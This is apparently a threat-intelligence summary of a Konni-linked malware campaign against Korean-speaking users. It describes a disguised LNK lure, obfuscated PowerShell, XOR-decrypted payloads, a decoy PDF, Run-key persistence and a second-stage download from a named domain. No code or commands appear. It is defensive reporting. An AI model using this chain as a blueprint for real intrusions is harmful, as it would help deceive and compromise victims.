A suspicious ZIP archive delivered a Korean-named LNK file disguised as a PDF proposal, and the source assesses its TTPs as similar to prior operations linked to DPRK's Konni group. The infection chain uses a double-extension LNK with a PDF icon to run obfuscated PowerShell, carve embedded content from the LNK, decrypt payloads with XOR, display a decoy proposal PDF, and unpack a CAB into the public Documents directory. The decoy includes a KakaoTalk Open Chat link themed around Naver and Coupang online-store marketing, suggesting social engineering aimed at Korean-speaking users. Later stages run start.vbs and batch files for persistence via HKCU Run, download a password-protected ZIP from ausbildungsbuddy.de, and continue execution through additional scripts. The campaign is notable for combining Korean-language lure material, multi-stage script execution, cleanup, and potentially compromised infrastructure in a flow the author links cautiously to Konni-style DPRK activity.